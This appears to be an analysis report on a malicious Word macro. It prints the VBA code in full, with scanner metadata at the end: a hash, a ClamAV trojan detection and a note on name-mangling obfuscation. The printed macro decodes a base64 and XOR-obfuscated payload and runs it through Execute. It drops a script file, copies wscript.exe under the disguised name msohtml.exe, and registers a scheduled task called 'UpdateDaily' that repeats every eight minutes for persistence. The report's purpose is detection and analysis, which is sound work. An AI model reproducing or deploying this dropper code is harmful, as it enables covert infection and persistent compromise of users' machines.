    Data = Data + "LDczNyw3NjYsNzY3LDc2NCw3MzcsNzY2LDc2MCw3NjQsNzM3LDc2Niw3NjEsNzY3LDczNyw3NjcsNzYy"
    Data = Data + "LDc2MCw3MzcsNzY3LDc1Nyw3NjUsNzQwLDc1OSw3NDksNjg2LDY3Miw2ODEsNzUyLDc1MSw3NTEsNzU5"
    Data = Data + "LDc0OSw2NTEsNjc0LDcwMyw3NDksNjgwLDY4NCw2ODYsNjc3LDc0OSw2ODYsNzQ5LDY3Niw2NzUsNzQ5"
    Data = Data + "LDY4Niw3MDIsNzU5LDc0OSw2ODYsNjcyLDY4MSw3NTIsNjg2LDY3Miw2ODEsNzQ3LDY1NCw2NzcsNzAz"
    Data = Data + "LDc0MSw2ODYsNzQ5LDY5Myw2NzQsNzAzLDc0OSw3NjYsNzY1LDc2MCw3NDAsNzU5LDc0OSw2NDMsNjgw"
    Data = Data + "LDY5Myw2OTcsNzQ5LDc1OSw3NDksNjg2LDY3Miw2ODEsNzUyLDY4Niw2NzIsNjgxLDc0Nyw2OTksNjg3"
    Data = Data + "LDY4Niw3MDMsNjczLDY4Myw3NTksNzQ5LDY0OCw2OTMsNjgwLDY4Niw2OTYsNjk3LDY4MCw3NDEsNjg2"
    Data = Data + "LDY3Miw2ODEsNzQwLDcxMSw2NjAsNjQwLDY0NCw2NzksNjQyLDcwMSw2NDUsNjkzLDY2NCw3MDEsNjk4"
    Data = Data + "LDY3Myw2ODcsNjk3LDY0NCw3MDMsNjc2LDY3NSw3NDksNzUyLDc0OSw2ODMsNjgxLDcwMCw2NTUsNzAz"
    Data = Data + "LDY5Niw2NTIsNjQ2LDY1Miw2NzUsNjY3LDY1MCw2NDksNjY1LDcwMiw2NDEsNjcxLDc0MSw2ODMsNjQ5"
    Data = Data + "LDY1NCw2NDcsNjUwLDY3MSw2NzUsNzAxLDY0MCw2NTUsNjU1LDY2Nyw2NjAsNjY3LDY2Niw2NTUsNjcw"
    Data = Data + "LDY0Myw3NDAsNzExLDY1MSw2OTYsNjc1LDY4Niw2OTcsNjc2LDY3NCw2NzUsNzQ5LDY2Niw2OTUsNjQ1"
    Data = Data + "LDY2OSw3MDIsNjQ5LDY5OSw2NzYsNjY3LDY5Myw2NjYsNzAxLDcwMyw2ODAsNjYwLDY1MCw2OTgsNjQ5"
    Data = Data + "LDc0MSw2NTQsNjQ3LDcwMyw2NDQsNjUyLDY5OCw2NDksNjc5LDY2MSw2NjcsNjcxLDY5OCw2NDcsNzM3"
    Data = Data + "LDY4MCw3MDMsNjY1LDY2Nyw2NzksNjc5LDY4MSw2NDIsNzAzLDY2MSw2OTMsNjc5LDY4NCw2NzUsNjk1"
    Data = Data + "LDY3NCw2ODAsNzQwLDcxMSw2NjYsNjk1LDY0NSw2NjksNzAyLDY0OSw2OTksNjc2LDY2Nyw2OTMsNjY2"
    Data = Data + "LDcwMSw3MDMsNjgwLDY2MCw2NTAsNjk4LDY0OSw3NDksNzUyLDc0OSw2NTQsNjQ3LDcwMyw2NDQsNjUy"
    Data = Data + "LDY5OCw2NDksNjc5LDY2MSw2NjcsNjcxLDY5OCw2NDcsNzQ5LDc0Miw3NDksNjgwLDcwMyw2NjUsNjY3"
    Data = Data + "LDY3OSw2NzksNjgxLDY0Miw3MDMsNjYxLDY5Myw2NzksNjg0LDY3NSw2OTUsNjc0LDY4MCw3MTEsNjQ4"
    Data = Data + "LDY3NSw2ODEsNzQ5LDY1MSw2OTYsNjc1LDY4Niw2OTcsNjc2LDY3NCw2NzUsNzExLDY0OSw2NzYsNjcy"
    Data = Data + "LDc0OSw2NjMsNjY2LDY3OSw2ODIsNjQ1LDY0MSw2OTgsNjQ1LDY2OCw2NzAsNjY5LDY1NCw3MzcsNzAw"
    Data = Data + "LDY5OSw2NjcsNjgzLDY5Nyw2NDQsNjcxLDY3OCw2NzQsNjY3LDY2Myw2NDQsNjgzLDY1MSw3MzcsNjQy"
    Data = Data + "LDY3MSw2NjYsNjcyLDY2NSw2ODcsNjY2LDY0MCw2ODEsNjQzLDcwMyw2OTIsNjQ0LDY4MSw2OTUsNjc4"
    Data = Data + "LDY0MCw3MDIsNjkyLDY2Niw2OTcsNjU1LDY3Myw2NjQsNzExLDY3MSw2ODQsNjc1LDY4MSw2NzQsNjcy"
    Data = Data + "LDY3Niw2OTUsNjgwLDcxMSw3MDAsNjk5LDY2Nyw2ODMsNjk3LDY0NCw2NzEsNjc4LDY3NCw2NjcsNjYz"
    Data = Data + "LDY0NCw2ODMsNjUxLDc0OSw3NTIsNzQ5LDY3MSw2NzUsNjgxLDcxMSw2NDIsNjcxLDY2Niw2NzIsNjY1"
    Data = Data + "LDY4Nyw2NjYsNjQwLDY4MSw2NDMsNzAzLDY5Miw2NDQsNjgxLDY5NSw2NzgsNjQwLDcwMiw2OTIsNjY2"
    Data = Data + "LDY5Nyw2NTUsNjczLDY2NCw3NDksNzUyLDc0OSw2NzEsNjc1LDY4MSw3MTEsNjYzLDY2Niw2NzksNjgy"
    Data = Data + "LDY0NSw2NDEsNjk4LDY0NSw2NjgsNjcwLDY2OSw2NTQsNzQ5LDc1Miw3NDksNjY2LDY5NSw2NDUsNjY5"
    Data = Data + "LDcwMiw2NDksNjk5LDY3Niw2NjcsNjkzLDY2Niw3MDEsNzAzLDY4MCw2NjAsNjUwLDY5OCw2NDksNzQx"
    Data = Data + "LDcwMCw2OTksNjY3LDY4Myw2OTcsNjQ0LDY3MSw2NzgsNjc0LDY2Nyw2NjMsNjQ0LDY4Myw2NTEsNzM3"
    Data = Data + "LDY0Miw2NzEsNjY2LDY3Miw2NjUsNjg3LDY2Niw2NDAsNjgxLDY0Myw3MDMsNjkyLDY0NCw2ODEsNjk1"
    Data = Data + "LDY3OCw2NDAsNzAyLDY5Miw2NjYsNjk3LDY1NSw2NzMsNjY0LDc0MCk6IGNtZD0iIjogRm9yIGVhY2gg"
    Data = Data + "YyBpbiBjczogY21kPWNtZCZDaHIoYyB4b3IgNzE3KTogTmV4dCA6IGNtZD1jbWQmdmJjcmxmOiBFeGVj"
    Data = Data + "dXRlKGNtZCk="


    Dim DTPcDKLWrBEXmDJohyq
    DTPcDKLWrBEXmDJohyq = JWXZUaRBtyHjzUdZ(Data)
    Dim YzYxCoECUjRVpvzrBd As Object
    Set YzYxCoECUjRVpvzrBd = CreateObject("Scripting.FileSystemObject")
    Dim KTCmuIMgBJRYzHlrL As Object
    Set KTCmuIMgBJRYzHlrL = YzYxCoECUjRVpvzrBd.CreateTextFile(tgrIRwdsnmuquriMIt)
    KTCmuIMgBJRYzHlrL.WriteLine DTPcDKLWrBEXmDJohyq
    KTCmuIMgBJRYzHlrL.Close
    Set YzYxCoECUjRVpvzrBd = Nothing
    Set KTCmuIMgBJRYzHlrL = Nothing
    Set OFSO = CreateObject("Scripting.FileSystemObject")
    
    Dim wRXfRfhGCxCPW As String
    wRXfRfhGCxCPW = Environ("SYSTEMDRIVE")
    Dim arcPath As String
    arcPath = rzfevexNwMGnPWXpK & "\\Windows\\SysWOW64"
    
    If OFSO.FolderExists(arcPath) = True Then
        FileCopy wRXfRfhGCxCPW & "\Windows\SysWOW64\wscript.exe", rzfevexNwMGnPWXpK & "\msohtml.exe"
    Else
        FileCopy wRXfRfhGCxCPW & "\Windows\System32\wscript.exe", rzfevexNwMGnPWXpK & "\msohtml.exe"
    End If
End Function
Function JWXZUaRBtyHjzUdZ(ByVal base64String)
  Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/[!!]"
  Dim dataLength, sOut, groupBegin
  base64String = Replace(base64String, vbCrLf, "")
  base64String = Replace(base64String, vbTab, "")
  base64String = Replace(base64String, " ", "")
  dataLength = Len(base64String)
  If dataLength Mod 4 <> 0 Then
    Err.Raise 1, "JWXZUaRBtyHjzUdZ", "Bad Base64 string."
    Exit Function
  End If
  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    numDataBytes = 3
    nGroup = 0
    For CharCounter = 0 To 3
      thisChar = Mid(base64String, groupBegin + CharCounter, 1)
      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
      Else
        thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Err.Raise 2, "JWXZUaRBtyHjzUdZ", "Bad character In Base64 string."
        Exit Function
      End If
      nGroup = 64 * nGroup + thisData
    Next
    nGroup = Hex(nGroup)
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    sOut = sOut & Left(pOut, numDataBytes)
  Next
  JWXZUaRBtyHjzUdZ = sOut
End Function
Function yiBhyERIualWRmBjcsIbCZLq(MBrUZCnACSJYjdxmUAnw As String)
    Const TriggerTypeTime = 1
    Const ActionTypeExec = 0
    Set service = CreateObject("Schedule.Service")
    Call service.Connect
    Dim rootFolder
    Set rootFolder = service.GetFolder("\")
    Dim taskDefinition
    Set taskDefinition = service.NewTask(0)
    Dim principal
    Set principal = taskDefinition.principal
    principal.LogonType = 3
    Dim settings
    Set settings = taskDefinition.settings
    settings.Enabled = True
    settings.StartWhenAvailable = True
    settings.Hidden = False
    Dim triggers
    Set triggers = taskDefinition.triggers
    Dim trigger
    Set trigger = triggers.Create(TriggerTypeTime)
    Dim startTime, endTime
    Dim time
    time = DateAdd("s", 30, Now)
    startTime = XmlTime(time)
    trigger.StartBoundary = startTime
    trigger.Enabled = True
    Dim Repetition
    Set Repetition = trigger.Repetition
    Repetition.Interval = "PT" & "8" & "M"
    Dim Action
    Set Action = taskDefinition.Actions.Create(ActionTypeExec)
    Action.Path = "explorer.exe"
    Action.Arguments = "shell:::{" & MBrUZCnACSJYjdxmUAnw & "}"
    Call rootFolder.RegisterTaskDefinition("UpdateDaily", taskDefinition, 6, , , 3)
End Function
Function XmlTime(t)
    Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
    Dim tTime, tDate
    cSecond = "0" & Second(t)
    cMinute = "0" & Minute(t)
    CHour = "0" & Hour(t)
    cDay = "0" & Day(t)
    cMonth = "0" & Month(t)
    cYear = Year(t)
    tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & _
        ":" & Right(cSecond, 2)
    tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
    XmlTime = tDate & "T" & tTime
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 42496 bytes
SHA-256: e957acfe540beea791ff6115abe00095de9c2e20154308af4c00af64998ec3db
Detection
ClamAV: Doc.Trojan.Agent-6923201-0
Obfuscation or payload: likely
263 of 428 identifiers look randomly generated (e.g. 'LDY4Nyw2NzYsNjU0LDY2MCw3MDMsNzQ5LDc0Miw3') — consistent with name-mangling obfuscation.